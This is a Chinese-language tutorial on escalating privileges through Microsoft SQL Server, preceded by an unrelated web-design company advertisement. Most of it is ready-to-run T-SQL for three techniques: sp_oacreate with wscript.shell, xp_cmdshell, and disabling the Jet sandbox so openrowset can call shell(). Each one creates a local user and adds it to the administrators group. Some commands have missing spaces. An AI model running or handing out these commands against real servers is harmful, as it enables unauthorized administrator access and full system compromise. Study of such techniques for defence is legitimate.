使用sp_oacreate進(jìn)行提權(quán)

創(chuàng)新互聯(lián)公司服務(wù)項(xiàng)目包括四子王網(wǎng)站建設(shè)、四子王網(wǎng)站制作、四子王網(wǎng)頁制作以及四子王網(wǎng)絡(luò)營銷策劃等。多年來，我們專注于互聯(lián)網(wǎng)行業(yè)，利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等，向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案，四子王網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前，我們服務(wù)的客戶以成都為中心已經(jīng)輻射到四子王省份的部分城市，未來相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任！

--提權(quán)語句--sp_configure的作用是顯示或更改當(dāng)前服務(wù)器的全局配置設(shè)置，執(zhí)行成功返回0，失敗返回1

EXEC sp_configure'show advanced options',1;

--使前面的配置生效RECONFIGURE;

EXEC sp_configure'Ole Automation Procedures',1;

RECONFIGURE;

declare @shell int

--使用sp_oacreate調(diào)用wscript.shell組件，將返回的對(duì)象存儲(chǔ)到@shell變量中。

exec sp_oacreate'wscript.shell',@shell output

--使用sp_oamethod 調(diào)用@shell對(duì)象中的Run方法，執(zhí)行添加用戶的命令，null是run方法的返回值，我們不需要用返回值，所以寫null.

exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user margin margin /add'

exec sp_oacreate'wscript.shell',@shell output

--使用sp_oamethod 調(diào)用@shell對(duì)象中的Run方法，執(zhí)行添加用戶的命令

exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators margin /add'

--恢復(fù)語句EXEC

sp_configure'Ole Automation Procedures',0;

RECONFIGURE;

EXEC sp_configure'show advanced options',0;

RECONFIGURE;

以上是使用sp_oacreate的提權(quán)語句，主要是用來調(diào)用OLE對(duì)象（Object Linking and Embedding的縮寫，VB中的OLE對(duì)象），利用OLE對(duì)象的run方法執(zhí)行系統(tǒng)命令。在oacreate的官方文檔里明確指出了，如果要使用OLE對(duì)象，必須要開啟'Ole Automation Procedures'，也就是EXEC sp_configure'Ole Automation Procedures',1;執(zhí)行這條語句前要執(zhí)行EXEC sp_configure'show advanced options',1;官方對(duì)這句話的解釋是：show advanced options,“顯示高級(jí)選項(xiàng)”選項(xiàng)用來顯示 sp_configure 系統(tǒng)存儲(chǔ)過程高級(jí)選項(xiàng)。 當(dāng)“顯示高級(jí)選項(xiàng)” 設(shè)置為 1 時(shí)，可以使用 sp_configure 列出高級(jí)選項(xiàng)。 默認(rèn)值為 0。

使用xp_cmdshell進(jìn)行提權(quán)

--提權(quán)語句

exec sp_configure 'showadvanced options', 1;reconfigure;

exec sp_configure 'xp_cmdshell',1;reconfigure; --開啟CMDshell

-- master..xp_cmdshell的全寫是master.dbo.xp_cmdshell

exec master..xp_cmdshell 'netusermarginmargin /add';

exec master..xp_cmdshell 'net localgroup administratorsmargin /add';

--恢復(fù)語句EXEC

sp_configure'show advanced options',0;

RECONFIGURE;

使用沙盒進(jìn)行提權(quán)

--提權(quán)語句

exec sp_configure 'showadvanced options',1;reconfigure;

--不開啟的話在執(zhí)行xp_regwrite會(huì)提示讓我們開啟，

exec sp_configure 'Ad HocDistributed Queries',1;reconfigure;

--關(guān)閉沙盒模式，如果一次執(zhí)行全部代碼有問題，先執(zhí)行上面兩句代碼。

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

--查詢是否正常關(guān)閉，經(jīng)過測(cè)試發(fā)現(xiàn)沙盒模式無論是開，還是關(guān)，都不會(huì)影響我們執(zhí)行下面的語句。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

--執(zhí)行系統(tǒng)命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')

沙盒模式SandBoxMode參數(shù)含義（默認(rèn)是2）

`0`：在任何所有者中禁止啟用安全模式

`1` ：為僅在允許范圍內(nèi)

`2` ：必須在access模式下

`3`：完全開啟

openrowset是可以通過OLE DB訪問SQL Server數(shù)據(jù)庫，OLE DB是應(yīng)用程序鏈接到SQL Server的的驅(qū)動(dòng)程序。

--恢復(fù)配置

--exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;

--exec sp_configure 'Ad HocDistributed Queries',0;reconfigure;

--exec sp_configure 'showadvanced options',0;reconfigure;

SQL Server官方參考文檔

sp_configure的官方文檔：https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-2017

sp_oacreate的官方文檔：https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql?view=sql-server-2017

sp_oamethod的官方文檔：https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oamethod-transact-sql?view=sql-server-2017

openrowset的官方文檔：https://docs.microsoft.com/zh-cn/sql/t-sql/functions/openrowset-transact-sql?view=sql-server-2017

ole db的官方文檔：https://docs.microsoft.com/zh-cn/sql/connect/oledb/ole-db/oledb-driver-for-sql-server-programming?view=sql-server-2017